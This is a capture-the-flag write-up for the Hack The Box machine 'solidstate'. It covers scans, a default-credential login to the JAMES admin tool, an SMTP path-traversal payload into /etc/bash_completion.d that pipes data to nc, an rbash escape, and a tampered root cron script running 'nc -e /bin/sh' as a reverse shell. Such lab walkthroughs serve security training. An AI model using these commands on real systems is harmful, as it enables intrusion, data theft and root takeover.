solidstate
Introduction:
Recon
nmap scan
eneloop@kinetic:…/hackthebox/solidstate/data$ sudo nmap -sS -sC -sV -O -T4 -Pn -oN nmap.solidstate.txt 10.10.10.51 Host discovery disabled (-Pn). All addresses will be marked ‘up’ and scan times will be slower. Starting Nmap 7.91 ( https://nmap.org ) at 2021-01-23 09:27 EST Nmap scan report for 10.10.10.51 Host is up (0.015s latency). Not shown: 995 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0) | ssh-hostkey: | 2048 77:00:84:f5:78:b9:c7:d3:54:cf:71:2e:0d:52:6d:8b (RSA) | 256 78:b8:3a:f6:60:19:06:91:f5:53:92:1d:3f:48:ed:53 (ECDSA) |_ 256 e4:45:e9:ed:07:4d:73:69:43:5a:12:70:9d:c4:af:76 (ED25519) 25/tcp open smtp JAMES smtpd 2.3.2 |_smtp-commands: solidstate Hello nmap.scanme.org (10.10.14.38 [10.10.14.38]), 80/tcp open http Apache httpd 2.4.25 ((Debian)) |_http-server-header: Apache/2.4.25 (Debian) |_http-title: Home - Solid State Security 110/tcp open pop3 JAMES pop3d 2.3.2 119/tcp open nntp JAMES nntpd (posting ok) No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ). TCP/IP fingerprint: OS:SCAN(V=7.91%E=4%D=1/23%OT=22%CT=1%CU=34458%PV=Y%DS=2%DC=I%G=Y%TM=600C327 OS:1%P=x86_64-pc-linux-gnu)SEQ(SP=100%GCD=1%ISR=109%TI=Z%CI=I%II=I%TS=8)OPS OS:(O1=M54DST11NW6%O2=M54DST11NW6%O3=M54DNNT11NW6%O4=M54DST11NW6%O5=M54DST1 OS:1NW6%O6=M54DST11)WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6=7120)ECN OS:(R=Y%DF=Y%T=40%W=7210%O=M54DNNSNW6%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=A OS:S%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R OS:=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F OS:=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N% OS:T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD OS:=S)
Network Distance: 2 hops Service Info: Host: solidstate; OS: Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 29.98 seconds
Additional ports discovered -
eneloop@kinetic:…/hackthebox/solidstate/data$ nmap -p0- -v -A -T4 10.10.10.51 Starting Nmap 7.91 ( https://nmap.org ) at 2021-01-23 09:28 EST NSE: Loaded 153 scripts for scanning. NSE: Script Pre-scanning. Initiating NSE at 09:28 Completed NSE at 09:28, 0.00s elapsed Initiating NSE at 09:28 Completed NSE at 09:28, 0.00s elapsed Initiating NSE at 09:28 Completed NSE at 09:28, 0.00s elapsed Initiating Ping Scan at 09:28 Scanning 10.10.10.51 [2 ports] Completed Ping Scan at 09:28, 0.01s elapsed (1 total hosts) Initiating Parallel DNS resolution of 1 host. at 09:28 Completed Parallel DNS resolution of 1 host. at 09:28, 0.01s elapsed Initiating Connect Scan at 09:28 Scanning 10.10.10.51 [65536 ports] Discovered open port 25/tcp on 10.10.10.51 Discovered open port 22/tcp on 10.10.10.51 Discovered open port 80/tcp on 10.10.10.51 Discovered open port 110/tcp on 10.10.10.51 Discovered open port 119/tcp on 10.10.10.51 Discovered open port 4555/tcp on 10.10.10.51
eneloop@kinetic:…/hackthebox/solidstate/data$ nikto -url http://10.10.10.51/
- Nikto v2.1.6
- Target IP: 10.10.10.51
- Target Hostname: 10.10.10.51
- Target Port: 80
- Start Time: 2021-01-23 09:52:40 (GMT-5)
- Server: Apache/2.4.25 (Debian)
- The anti-clickjacking X-Frame-Options header is not present.
- The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
- The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
- No CGI Directories found (use ‘-C all’ to force check all possible dirs)
- Server may leak inodes via ETags, header found with file /, inode: 1e60, size: 5610a1e7a4c9b, mtime: gzip
- Apache/2.4.25 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
- Allowed HTTP Methods: GET, HEAD, POST, OPTIONS
- OSVDB-3268: /images/: Directory indexing found.
- OSVDB-3092: /LICENSE.txt: License file found may identify site software.
- OSVDB-3233: /icons/README: Apache default file found.
- 7863 requests: 0 error(s) and 9 item(s) reported on remote host
- End Time: 2021-01-23 09:55:20 (GMT-5) (160 seconds)
- 1 host(s) tested
Added a host entry
sudo echo “10.10.10.51 solidstate.htb” » /etc/hosts
Enumeration
Shellcodes: No Results
Homepage reveals following information
- possible account [email protected]
James Admin tool
1eneloop@kinetic:.../hackthebox/solidstate/data$ nc 10.10.10.51 4555
2JAMES Remote Administration Tool 2.3.2
3Please enter your login and password
4Login id:
5root
6Password:
7root
8Welcome root. HELP for a list of commands
9help
10Currently implemented commands:
11help display this help
12listusers display existing accounts
13countusers display the number of existing accounts
14adduser [username] [password] add a new user
15verify [username] verify if specified user exist
16deluser [username] delete existing user
17setpassword [username] [password] sets a user's password
18setalias [user] [alias] locally forwards all email for 'user' to 'alias'
19showalias [username] shows a user's current email alias
20unsetalias [user] unsets an alias for 'user'
21setforwarding [username] [emailaddress] forwards a user's email to another email address
22showforwarding [username] shows a user's current email forwarding
23unsetforwarding [username] removes a forward
24user [repositoryname] change to another user repository
25shutdown kills the current JVM (convenient when James is run as a daemon)
26quit close connection
27listusers
28Existing accounts 5
29user: james
30user: thomas
31user: john
32user: mindy
33user: mailadmin
search for exploits
1eneloop@kinetic:.../hackthebox/solidstate/data$ searchsploit james
2----------------------------------------------------------------------------------- ---------------------------------
3 Exploit Title | Path
4----------------------------------------------------------------------------------- ---------------------------------
5Apache James Server 2.2 - SMTP Denial of Service | multiple/dos/27915.pl
6Apache James Server 2.3.2 - Insecure User Creation Arbitrary File Write (Metasploi | linux/remote/48130.rb
7Apache James Server 2.3.2 - Remote Command Execution | linux/remote/35513.py
8WheresJames Webcam Publisher Beta 2.0.0014 - Remote Buffer Overflow | windows/remote/944.c
9----------------------------------------------------------------------------------- ---------------------------------
Exploitation strategy -
- Exploit the remote administration tool by setting creds for an existing user
- send a reverse shell command to a file using the exploit above
- start a listener and login using the user to trigger the exploit
Exploitation
MAIL FROM: '[email protected] RCPT TO: ../../../../../../../../etc/bash_completion.d DATA From: [email protected] ' find / -type f | nc 10.10.14.38 4444 . QUIT
Reset all email accounts and read emails. You will realize that mindy’s email should potentially have creds based on the chatter between john and james.
Lets reset mindy and login using a mail client to read her emails -
(py2) eneloop@kinetic:…/hackthebox/solidstate/data$ nc 10.10.10.51 4555 JAMES Remote Administration Tool 2.3.2 Please enter your login and password Login id: root Password: root Welcome root. HELP for a list of commands help Currently implemented commands: help display this help listusers display existing accounts countusers display the number of existing accounts adduser [username] [password] add a new user verify [username] verify if specified user exist deluser [username] delete existing user setpassword [username] [password] sets a user’s password setalias [user] [alias] locally forwards all email for ‘user’ to ‘alias’ showalias [username] shows a user’s current email alias unsetalias [user] unsets an alias for ‘user’ setforwarding [username] [emailaddress] forwards a user’s email to another email address showforwarding [username] shows a user’s current email forwarding unsetforwarding [username] removes a forward user [repositoryname] change to another user repository shutdown kills the current JVM (convenient when James is run as a daemon) quit close connection setpassword mindy mindy Password for mindy reset
Unknown command quit Bye
SSH using the password retried from email, and we endup in a rbash
1(py2) eneloop@kinetic:.../hackthebox/solidstate/data$ ssh [email protected]
2[email protected]'s password:
3Linux solidstate 4.9.0-3-686-pae #1 SMP Debian 4.9.30-2+deb9u3 (2017-08-06) i686
4
5The programs included with the Debian GNU/Linux system are free software;
6the exact distribution terms for each program are described in the
7individual files in /usr/share/doc/*/copyright.
8
9Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
10permitted by applicable law.
11Last login: Tue Aug 22 14:00:02 2017 from 192.168.11.142
12-rbash: $'\254\355\005sr\036org.apache.james.core.MailImpl\304x\r\345\274\317ݬ\003': command not found
13-rbash: L: command not found
14-rbash: attributestLjava/util/HashMap: No such file or directory
15-rbash: L
16 errorMessagetLjava/lang/String: No such file or directory
17-rbash: L
18 lastUpdatedtLjava/util/Date: No such file or directory
19-rbash: Lmessaget!Ljavax/mail/internet/MimeMessage: No such file or directory
20-rbash: $'L\004nameq~\002L': command not found
21-rbash: recipientstLjava/util/Collection: No such file or directory
22-rbash: L: command not found
23-rbash: $'remoteAddrq~\002L': command not found
24-rbash: remoteHostq~LsendertLorg/apache/mailet/MailAddress: No such file or directory
25-rbash: $'\221\222\204m\307{\244\002\003I\003posL\004hostq~\002L\004userq~\002xp': command not found
26-rbash: $'L\005stateq~\002xpsr\035org.apache.mailet.MailAddress': command not found
27-rbash: @team.pl>
28Message-ID: <28046011.0.1611416094084.JavaMail.root@solidstate>
29MIME-Version: 1.0
30Content-Type: text/plain; charset=us-ascii
31Content-Transfer-Encoding: 7bit
32Delivered-To: ../../../../../../../../etc/bash_completion.d@localhost
33Received: from 10.10.14.38 ([10.10.14.38])
34 by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 37
35 for <../../../../../../../../etc/bash_completion.d@localhost>;
36 Sat, 23 Jan 2021 10:34:53 -0500 (EST)
37Date: Sat, 23 Jan 2021 10:34:53 -0500 (EST)
38From: [email protected]
39
40: No such file or directory
41-rbash: $'\r': command not found
42-rbash: $'\254\355\005sr\036org.apache.james.core.MailImpl\304x\r\345\274\317ݬ\003': command not found
43-rbash: L: command not found
44-rbash: attributestLjava/util/HashMap: No such file or directory
45-rbash: L
46 errorMessagetLjava/lang/String: No such file or directory
47-rbash: L
48 lastUpdatedtLjava/util/Date: No such file or directory
49-rbash: Lmessaget!Ljavax/mail/internet/MimeMessage: No such file or directory
50-rbash: $'L\004nameq~\002L': command not found
51-rbash: recipientstLjava/util/Collection: No such file or directory
52-rbash: L: command not found
53-rbash: $'remoteAddrq~\002L': command not found
54-rbash: remoteHostq~LsendertLorg/apache/mailet/MailAddress: No such file or directory
55-rbash: $'\221\222\204m\307{\244\002\003I\003posL\004hostq~\002L\004userq~\002xp': command not found
56-rbash: $'L\005stateq~\002xpsr\035org.apache.mailet.MailAddress': command not found
57-rbash: @team.pl>
58Message-ID: <5839625.1.1611416616236.JavaMail.root@solidstate>
59MIME-Version: 1.0
60Content-Type: text/plain; charset=us-ascii
61Content-Transfer-Encoding: 7bit
62Delivered-To: ../../../../../../../../etc/bash_completion.d@localhost
63Received: from 10.10.14.38 ([10.10.14.38])
64 by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 918
65 for <../../../../../../../../etc/bash_completion.d@localhost>;
66 Sat, 23 Jan 2021 10:43:36 -0500 (EST)
67Date: Sat, 23 Jan 2021 10:43:36 -0500 (EST)
68From: [email protected]
69
70: No such file or directory
71-rbash: $'\r': command not found
72mindy@solidstate:~$
73
Escape rbash
1(py2) eneloop@kinetic:.../hackthebox/solidstate/data$ ssh [email protected] -t "bash --noprofile"
2[email protected]'s password:
3Permission denied, please try again.
4[email protected]'s password:
5${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ echo $SHELL
6/bin/rbash
7${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ cd ..
8${debian_chroot:+($debian_chroot)}mindy@solidstate:/home$ ls
9james mindy
10${debian_chroot:+($debian_chroot)}mindy@solidstate:/home$
11
Post-exploit/PrivEsc
1${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ cat /opt/tmp.py
2#!/usr/bin/env python
3import os
4import sys
5try:
6 os.system('rm -r /tmp/* ')
7 os.system('date >/home/mindy/date.out')
8except:
9 sys.exit()
10
11${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ ls -l /home/mindy/date.out
12-rw-r--r-- 1 root root 29 Jan 23 14:06 /home/mindy/date.out
13${debian_chroot:+($debian_chroot)}mindy@solidstate:~$
14
1
2${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ vi /opt/tmp.py
3${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ cat /opt/tmp.py
4#!/usr/bin/env python
5import os
6import sys
7try:
8 os.system('rm -r /tmp/* ')
9 os.system('nc -e /bin/sh 10.10.14.38 4444')
10except:
11 sys.exit()
12
13${debian_chroot:+($debian_chroot)}mindy@solidstate:~$
14
(py3) root@kinetic:~# nc -lvnp 4444 listening on [any] 4444 …
connect to [10.10.14.38] from (UNKNOWN) [10.10.10.51] 41498 ls -l total 4 -rw——- 1 root root 33 Nov 18 09:29 root.txt cat root.txt 4f4XXXXXXXXXXXXXXXXXX4953d whoami root
Notes: